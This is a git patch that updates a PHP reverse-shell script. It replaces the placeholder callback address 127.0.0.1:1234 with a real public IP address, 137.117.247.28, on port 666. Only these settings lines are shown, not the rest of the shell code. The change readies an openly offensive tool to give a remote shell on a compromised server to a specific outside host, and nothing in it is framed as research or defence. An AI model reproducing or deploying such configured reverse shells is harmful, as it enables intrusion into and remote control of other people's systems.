From f8c5eeeb4c2ae6d0dab2978b34b230daaa2808f0 Mon Sep 17 00:00:00 2001 From: r4staa <52297273+r4staa@users.noreply.github.com> Date: Wed, 18 Sep 2019 16:34:18 -0500 Subject: [PATCH] Update php-reverse-shell.php --- php-reverse-shell.php | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/php-reverse-shell.php b/php-reverse-shell.php index 2503b71..2f5b427 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -46,8 +46,8 @@ set_time_limit (0); $VERSION = "1.0"; -$ip = '127.0.0.1'; // CHANGE THIS -$port = 1234; // CHANGE THIS +$ip = '137.117.247.28'; // CHANGE THIS +$port = 666; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null;